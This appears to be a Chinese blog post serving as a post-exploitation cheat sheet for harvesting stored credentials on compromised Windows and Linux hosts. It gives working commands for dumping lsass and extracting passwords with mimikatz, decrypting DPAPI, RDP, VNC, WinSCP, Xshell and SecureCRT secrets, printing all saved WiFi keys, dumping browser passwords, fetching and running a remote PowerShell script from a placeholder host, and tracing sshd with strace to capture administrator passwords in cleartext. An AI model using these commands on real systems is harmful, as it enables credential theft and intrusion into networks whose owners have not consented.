内网凭据密码收集方法和技巧

RDP凭证

1.抓取本机RDP密码,工具mimikatz

系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,这时抓取的明文密码为空。

可以尝试解密NTLM(New Technology LAN Manager)获取明文密码,NTLM 是用于Windows身份验证的主要协议之一

2.无用户上线,可以通过dump内存的方式获取密码

如:procdump64.exe -accepteula -ma lsass.exe lsass.dmp

使用mimikatz进行解密

sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full

3.登陆凭证

当我们使用Windows自带的远程桌面登录成功并选择保存凭据时,会在本地留下rdp登录凭证

reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"

获取Credentials:

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

获取guidMasterKey

mimikatz.exe "dpapi::cred /in:%userprofile%\AppData\Local\Microsoft\Credentials\Credentials的值" exit

mimikatz.exe "privilege::debug" "sekurlsa::dpapi" > cerd.txt

查找guid对应的MasterKey:

mimikatz.exe "dpapi::cred /in:%userprofile%\AppData\Local\Microsoft\Credentials\ Credentials值/masterkey:masterkey值" exit

4.其他

也可以利用netpass直接抓取密码https://www.nirsoft.net/utils/network_password_recovery.html

命令行版本:https://www.nirsoft.net/password_recovery_tools.html

 

VNC密码

配置路径:c:\Program Files\uvnc bvba\UltraVNC\ultravnc.ini,解密工具:https://github.com/jeroennijhof/vncpwd

TightVNC

TightVNC的加密后密码存在注册表里内,需要管理员权限

reg query HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server /v ControlPassword 
reg query HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server /v password
reg query HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server /v RfbPort

解密工具:https://github.com/jeroennijhof/vncpwd

RealVNC

ealVNC的加密后密码存在注册表里内,需要管理员权限。

reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver /v password

解密工具:https://github.com/jeroennijhof/vncpwd

 

VPN密码

Windows自带VPN连接,如果在配置VPN时选择记住此密码则会保存连接信息

默认保存连接信息目录

%AppData%\Roaming\Microsoft\Network\Connections\Pbk


Dialupass使用说明和下载地址:https://www.nirsoft.net/utils/dialupass.html
Dialupass使用说明和下载地址:https://www.nirsoft.net/utils/dialupass.html

WiFi密码

WiFi信息查询命令,在cmd下执行,无需管理员权限
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear

简介:Xshell是一款功能强大的终端模拟器,支持SSH2,SSH3,SFTP,TELNET,RLOGIN和SERIAL。Xshell密码默认保存位置:

XShell 5:%userprofile%\Documents\NetSarang\Xshell\Sessions
XShell 6:%userprofile%\Documents\NetSarang Computer\6\Xshell\Sessions
XShell 7:%userprofile%\Documents\NetSarang Computer\7\Xshell\Sessions

Xshell

Xshell密码默认保存位置:

XShell 5:%userprofile%\Documents\NetSarang\Xshell\Sessions
XShell 6:%userprofile%\Documents\NetSarang Computer\6\Xshell\Sessions
XShell 7:%userprofile%\Documents\NetSarang Computer\7\Xshell\Sessions

SharpXDecrypt支持解密XShell所有版本,包括XShell 7:

 

Winscp

WinSCP 是一个 Windows 环境下使用的 SSH 的开源图形化 SFTP 客户端。同时支持 SCP 协议。它的主要功能是在本地与远程计算机间安全地复制文件,并且可以直接编辑文件。

通过注册表获得密文:

reg query "HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions"
reg query "HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\root@192.168.192.128"

通过winscppwd.exe即可解密:

winscppwd.exe root 192.168.192.128 密文
有时候管理员会导出配置为WinSCP.ini文件。
winscppwd下载地址:https://www.softpedia.com/get/Security/Password-Managers-Generators/winscppwd.shtml也可以使用SharpDecryptPwd直接获取密码

FinalShell默认配置文件地址:

%userprofile%\AppData\Local\finalshell\conn\xxx.json

使用FinalShell-Decoder选择目录即可解密:

SecureCRT

SecureCRT默认配置目录:

dir %APPDATA%\VanDyke\Config\Sessions\

SecureCRT 7.3.3之前的版本使用password加密算法,之后的版本使用password v2算法:

S:"Password"=u17cf50e394ecc2a06fa8919e1bd67cf0f37da34c78e7eb87a3a9a787a9785e802dd0eae4e8039c3ce234d34bfe28bbdc
S:"Password V2"=02:7b9f594a1f39bb36bbaa0d9688ee38b3d233c67b338e20e2113f2ba4d328b6fc8c804e3c02324b1eaad57a5b96ac1fc5cc1ae0ee2930e6af2e5e644a28ebe3fc

7.x 版本解密 [ 不带第一位 "u" ]

SecureCRTCipher.py dec 17cf50e394ecc2a06fa8919e1bd67cf0f37da34c78e7eb87a3a9a787a9785e802dd0eae4e8039c3ce234d34bfe28bbdc

8.x 版本解密 [ 不带前面三位 "02:" ]

SecureCRTCipher.py dec -v2 7b9f594a1f39bb36bbaa0d9688ee38b3d233c67b338e20e

浏览器

WebBrowserPassView使用说明和下载地址:https://www.nirsoft.net/utils/web_browser_password.html WebBrowserPassView支持解密以下浏览器:

  • • Internet Explorer (Version 4.0 - 11.0)

  • • Mozilla Firefox (All Versions)

  • • Google Chrome

  • • Chromium-Based Edge

  • • Safari

  • • Opera

  • • Brave

  • • Waterfox

  • • SeaMonkey

  • • Vivaldi

  • • Yandex

  • • Chromium

下载页面:https://www.nirsoft.net/password_recovery_tools.html

 

HackBrowserData 是一个浏览器数据(密码|历史记录|Cookie|书签|信用卡|下载记录|localStorage|浏览器插件)的导出工具,支持全平台主流浏览器。在Windows平台支持以下浏览器的密码,Cookie,书签和历史记录信息:

  • • Google Chrome

  • • Google Chrome Beta

  • • Chromium

  • • Microsoft Edge

  • • 360 极速浏览器

  • • QQ浏览器

  • • Brave

  • • Opera

  • • OperaGX

  • • Vivaldi

  • • Yandex

  • • CocCoc

  • • Firefox

  • • Firefox Beta

  • • Firefox Dev

  • • Firefox ESR

  • • Firefox Nightly

使用说明和下载地址:https://github.com/moonD4rk/HackBrowserData

 

浏览器

credgrap_ie_edge

工具地址:https://github.com/HanseSecure/credgrap_ie_edge 内存执行powershell解密即可

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://xxx/credgrap_ie_edge.ps1')"
 

Linux使用strace抓取密码

strace是一个可用于诊断、调试和教学的Linux用户空间跟踪器strace底层使用内核的ptrace特性来实现其功能。

使用strace抓取密码,必须要管理员登录才行,我们可以使用last命令来查看管理员最后登录的时间,登录顺序,由近到远

首先ps -elf |grep sshd 找到sshd的pid,使用nohup strace -f -p pid -o sshd.out.txt &来跟踪sshd进程

然后当管理员使用密码登录以后,下载 sshd.out.txt文件,在文件中搜索read(7, "\f\0\0\0\f,字符串后面的即是明文密码

 
posted @ 2023-10-12 16:41  妇愁者纞萌  阅读(413)  评论(0编辑  收藏  举报